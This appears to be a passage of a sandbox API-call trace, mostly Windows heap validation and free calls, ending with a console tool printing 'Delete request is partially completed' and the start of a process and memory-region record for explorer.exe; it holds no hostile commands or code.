HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x524068 | out: hHeap=0x510000) returned 1 [0085.736] GetProcessHeap () returned 0x510000 [0085.736] GetProcessHeap () returned 0x510000 [0085.736] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526708) returned 1 [0085.736] GetProcessHeap () returned 0x510000 [0085.736] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526708) returned 0x14 [0085.736] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526708 | out: hHeap=0x510000) returned 1 [0085.736] GetProcessHeap () returned 0x510000 [0085.736] GetProcessHeap () returned 0x510000 [0085.736] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526098) returned 1 [0085.736] GetProcessHeap () returned 0x510000 [0085.736] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526098) returned 0x10 [0085.736] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526098 | out: hHeap=0x510000) returned 1 [0085.736] GetProcessHeap () returned 0x510000 [0085.736] GetProcessHeap () returned 0x510000 [0085.736] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526728) returned 1 [0085.736] GetProcessHeap () returned 0x510000 [0085.736] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526728) returned 0x14 [0085.736] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526728 | out: hHeap=0x510000) returned 1 [0085.736] GetProcessHeap () returned 0x510000 [0085.736] GetProcessHeap () returned 0x510000 [0085.737] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5260b0) returned 1 [0085.737] GetProcessHeap () returned 0x510000 [0085.737] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5260b0) returned 0xc [0085.737] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5260b0 | out: hHeap=0x510000) returned 1 [0085.737] GetProcessHeap () returned 0x510000 [0085.737] GetProcessHeap () returned 0x510000 [0085.737] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526748) returned 1 [0085.737] GetProcessHeap () returned 0x510000 [0085.737] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526748) returned 0x14 [0085.737] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x526748 | out: hHeap=0x510000) returned 1 [0085.737] GetProcessHeap () returned 0x510000 [0085.737] GetProcessHeap () returned 0x510000 [0085.737] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x524090) returned 1 [0085.737] GetProcessHeap () returned 0x510000 [0085.737] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x524090) returned 0x1a [0085.737] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x524090 | out: hHeap=0x510000) returned 1 [0085.737] GetProcessHeap () returned 0x510000 [0085.737] GetProcessHeap () returned 0x510000 [0085.737] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526768) returned 1 [0085.737] GetProcessHeap () returned 0x510000 [0085.737] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526768) returned 0x14 [0085.737] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526788) returned 1 [0085.737] GetProcessHeap () returned 0x510000 [0085.737] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x526788) returned 0x14 [0085.737] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5267a8) returned 1 [0085.738] GetProcessHeap () returned 0x510000 [0085.738] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5267a8) returned 0x14 [0085.738] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5240b8) returned 1 [0085.738] GetProcessHeap () returned 0x510000 [0085.738] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5240b8) returned 0x1a [0085.738] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5267c8) returned 1 [0085.738] GetProcessHeap () returned 0x510000 [0085.738] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5267c8) returned 0x14 [0085.738] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5260c8) returned 1 [0085.738] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5267e8) returned 1 [0085.738] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5260e0) returned 1 [0085.738] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526808) returned 1 [0085.738] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526828) returned 1 [0085.738] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526848) returned 1 [0085.738] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526868) returned 1 [0085.738] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526888) returned 1 [0085.738] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5240e0) returned 1 [0085.738] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5268a8) returned 1 [0085.738] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x524108) returned 1 [0085.739] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5268c8) returned 1 [0085.739] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x524130) returned 1 [0085.739] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5268e8) returned 1 [0085.739] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5260f8) returned 1 [0085.739] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526908) returned 1 [0085.739] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5262d0) returned 1 [0085.739] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526928) returned 1 [0085.739] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526300) returned 1 [0085.739] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526948) returned 1 [0085.739] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526330) returned 1 [0085.739] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526968) returned 1 [0085.739] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526110) returned 1 [0085.739] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526988) returned 1 [0085.739] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526340) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5269a8) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526350) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5269c8) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5269e8) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526a08) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526380) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526a28) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526128) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526a48) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526a68) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526a88) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526140) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526aa8) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526ac8) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526ae8) returned 1 [0085.740] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526b08) returned 1 [0085.741] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526b28) returned 1 [0085.741] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526b48) returned 1 [0085.741] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526b68) returned 1 [0085.741] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526158) returned 1 [0085.741] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526b88) returned 1 [0085.741] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526170) returned 1 [0085.741] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526ba8) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526188) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526bc8) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5261a0) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526be8) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5280b8) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526c08) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526390) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526c28) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5270b8) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526c48) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x527110) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526c68) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x527168) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526c88) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5271c0) returned 1 [0085.742] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526ca8) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x527218) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526cc8) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x527270) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526ce8) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5272c8) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x526d08) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x527320) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5284b8) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x527378) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5284d8) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5273d0) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5284f8) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x527428) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x528518) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x527480) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x528538) returned 1 [0085.743] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5274d8) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x528558) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x527530) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x528578) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x527588) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x528598) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5275e0) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5285b8) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x527638) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5285d8) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x527690) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5285f8) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5276e8) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x528618) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x527740) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x528638) returned 1 [0085.744] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x527798) returned 1 [0085.745] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x528658) returned 1 [0085.745] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5277f0) returned 1 [0085.745] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x528678) returned 1 [0085.745] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525de0) returned 1 [0085.745] RegCloseKey (hKey=0x78) returned 0x0 [0085.745] GetProcessHeap () returned 0x510000 [0085.745] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x51f120) returned 1 [0085.745] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5253a8) returned 1 [0085.745] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x51f138) returned 1 [0085.745] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5253c8) returned 1 [0085.745] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x51f108) returned 1 [0085.745] RegCloseKey (hKey=0x74) returned 0x0 [0085.745] _memicmp (_Buf1=0x51f0f0, _Buf2=0x1c1318, _Size=0x7) returned 0 [0085.745] LoadStringW (in: hInstance=0x0, uID=0x8d, lpBuffer=0x525b50, cchBufferMax=256 | out: lpBuffer="Delete request is partially completed.\n") returned 0x27 [0085.745] lstrlenW (lpString="Delete request is partially completed.\n") returned 39 [0085.746] GetLastError () returned 0x0 [0085.746] lstrlenW (lpString="Delete request is partially completed.\n") returned 39 [0085.746] GetProcessHeap () returned 0x510000 [0085.746] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x523bb8) returned 1 [0085.746] __iob_func () returned 0x76e62900 [0085.746] GetProcessHeap () returned 0x510000 [0085.746] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5253c8 [0085.746] GetProcessHeap () returned 0x510000 [0085.746] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5253a8 [0085.746] GetProcessHeap () returned 0x510000 [0085.746] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5253e8 [0085.746] _memicmp (_Buf1=0x51f0f0, _Buf2=0x1c1318, _Size=0x7) returned 0 [0085.746] LoadStringW (in: hInstance=0x0, uID=0x1389, lpBuffer=0x525b50, cchBufferMax=256 | out: lpBuffer="ERROR:") returned 0x6 [0085.746] lstrlenW (lpString="ERROR:") returned 6 [0085.746] GetProcessHeap () returned 0x510000 [0085.746] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x51f108 [0085.746] GetProcessHeap () returned 0x510000 [0085.746] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x51f138 [0085.746] _memicmp (_Buf1=0x51f138, _Buf2=0x1c1318, _Size=0x7) returned 0 [0085.746] GetProcessHeap () returned 0x510000 [0085.746] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x1000) returned 0x528ca0 [0085.747] _vsnwprintf (in: _Buffer=0x528ca0, _BufferCount=0x7ff, _Format="%s ", _ArgList=0x30f9b4 | out: _Buffer="ERROR: ") returned 7 [0085.747] _fileno (_File=0x76e62940) returned 2 [0085.747] _errno () returned 0x7b07d8 [0085.747] _get_osfhandle (_FileHandle=2) returned 0xb [0085.747] _errno () returned 0x7b07d8 [0085.747] GetFileType (hFile=0xb) returned 0x2 [0085.747] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0085.747] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x30f94c | out: lpMode=0x30f94c) returned 1 [0085.748] __iob_func () returned 0x76e62900 [0085.748] __iob_func () returned 0x76e62900 [0085.748] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0085.748] lstrlenW (lpString="ERROR: ") returned 7 [0085.748] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x528ca0*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x30f974, lpReserved=0x0 | out: lpBuffer=0x528ca0*, lpNumberOfCharsWritten=0x30f974*=0x7) returned 1 [0085.749] _fileno (_File=0x76e62940) returned 2 [0085.749] _errno () returned 0x7b07d8 [0085.749] _get_osfhandle (_FileHandle=2) returned 0xb [0085.749] _errno () returned 0x7b07d8 [0085.749] GetFileType (hFile=0xb) returned 0x2 [0085.749] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0085.749] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x30f978 | out: lpMode=0x30f978) returned 1 [0085.750] __iob_func () returned 0x76e62900 [0085.750] __iob_func () returned 0x76e62900 [0085.750] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0085.750] lstrlenW (lpString="Delete request is partially completed.\n") returned 39 [0085.750] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x5277f0*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x30f9a0, lpReserved=0x0 | out: lpBuffer=0x5277f0*, lpNumberOfCharsWritten=0x30f9a0*=0x27) returned 1 [0085.751] GetProcessHeap () returned 0x510000 [0085.751] GetProcessHeap () returned 0x510000 [0085.751] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525268) returned 1 [0085.751] GetProcessHeap () returned 0x510000 [0085.751] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525268) returned 0x54 [0085.751] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5252c8) returned 1 [0085.751] GetProcessHeap () returned 0x510000 [0085.751] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5252c8) returned 0x80 [0085.751] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525b50) returned 1 [0085.751] GetProcessHeap () returned 0x510000 [0085.751] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525b50) returned 0x200 [0085.751] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x51f0f0) returned 1 [0085.751] GetProcessHeap () returned 0x510000 [0085.751] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51f0f0) returned 0x10 [0085.751] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525388) returned 1 [0085.751] GetProcessHeap () returned 0x510000 [0085.751] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525388) returned 0x14 [0085.751] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x528ca0) returned 1 [0085.751] GetProcessHeap () returned 0x510000 [0085.751] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x528ca0) returned 0x1000 [0085.751] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x51f138) returned 1 [0085.751] GetProcessHeap () returned 0x510000 [0085.751] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51f138) returned 0x10 [0085.752] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525368) returned 1 [0085.752] GetProcessHeap () returned 0x510000 [0085.752] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525368) returned 0x14 [0085.752] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525038) returned 1 [0085.752] GetProcessHeap () returned 0x510000 [0085.752] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525038) returned 0x64 [0085.752] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x51f0d8) returned 1 [0085.752] GetProcessHeap () returned 0x510000 [0085.752] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51f0d8) returned 0x10 [0085.752] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x524e58) returned 1 [0085.752] GetProcessHeap () returned 0x510000 [0085.752] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x524e58) returned 0x14 [0085.752] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x523f78) returned 1 [0085.752] GetProcessHeap () returned 0x510000 [0085.752] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x523f78) returned 0x1e [0085.752] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x51f0c0) returned 1 [0085.752] GetProcessHeap () returned 0x510000 [0085.752] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51f0c0) returned 0x10 [0085.753] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x524e38) returned 1 [0085.753] GetProcessHeap () returned 0x510000 [0085.753] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x524e38) returned 0x14 [0085.753] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5277f0) returned 1 [0085.753] GetProcessHeap () returned 0x510000 [0085.753] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5277f0) returned 0x50 [0085.753] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x523a18) returned 1 [0085.753] GetProcessHeap () returned 0x510000 [0085.753] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x523a18) returned 0x14 [0085.753] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x525d58) returned 1 [0085.753] GetProcessHeap () returned 0x510000 [0085.753] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x525d58) returned 0x64 [0085.753] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x523a38) returned 1 [0085.753] GetProcessHeap () returned 0x510000 [0085.753] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x523a38) returned 0x14 [0085.754] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x524ef0) returned 1 [0085.754] GetProcessHeap () returned 0x510000 [0085.754] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x524ef0) returned 0x8 [0085.754] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x523a58) returned 1 [0085.754] GetProcessHeap () returned 0x510000 [0085.754] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x523a58) returned 0x14 [0085.754] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x523a78) returned 1 [0085.754] GetProcessHeap () returned 0x510000 [0085.754] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x523a78) returned 0x14 [0085.754] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5253c8) returned 1 [0085.754] GetProcessHeap () returned 0x510000 [0085.754] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5253c8) returned 0x14 [0085.754] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5253a8) returned 1 [0085.754] GetProcessHeap () returned 0x510000 [0085.754] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5253a8) returned 0x14 [0085.754] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x51f108) returned 1 [0085.754] GetProcessHeap () returned 0x510000 [0085.754] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51f108) returned 0xe [0085.755] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x5253e8) returned 1 [0085.755] GetProcessHeap () returned 0x510000 [0085.755] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5253e8) returned 0x14 [0085.755] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x51f078) returned 1 [0085.755] GetProcessHeap () returned 0x510000 [0085.755] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51f078) returned 0x10 [0085.755] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x523a98) returned 1 [0085.755] GetProcessHeap () returned 0x510000 [0085.755] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x523a98) returned 0x14 [0085.755] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x524db8) returned 1 [0085.755] GetProcessHeap () returned 0x510000 [0085.755] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x524db8) returned 0x14 [0085.755] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x524dd8) returned 1 [0085.755] GetProcessHeap () returned 0x510000 [0085.755] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x524dd8) returned 0x14 [0085.755] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x524df8) returned 1 [0085.755] GetProcessHeap () returned 0x510000 [0085.756] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x524df8) returned 0x14 [0085.756] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x51f090) returned 1 [0085.756] GetProcessHeap () returned 0x510000 [0085.756] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51f090) returned 0x10 [0085.756] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x524e18) returned 1 [0085.756] GetProcessHeap () returned 0x510000 [0085.756] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x524e18) returned 0x14 [0085.756] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x524e78) returned 1 [0085.756] GetProcessHeap () returned 0x510000 [0085.756] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x524e78) returned 0x14 [0085.756] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x51f0a8) returned 1 [0085.756] GetProcessHeap () returned 0x510000 [0085.756] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51f0a8) returned 0x10 [0085.756] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x524e98) returned 1 [0085.756] GetProcessHeap () returned 0x510000 [0085.756] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x524e98) returned 0x14 [0085.756] HeapValidate (hHeap=0x510000, dwFlags=0x0, lpMem=0x51f060) returned 1 [0085.756] GetProcessHeap () returned 0x510000 [0085.756] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51f060) returned 0x10 Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x51938000" os_pid = "0x778" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 485 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 486 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 487 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 488 start_va = 0x40000 end_va = 0x41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 489 start_va = 0x50000 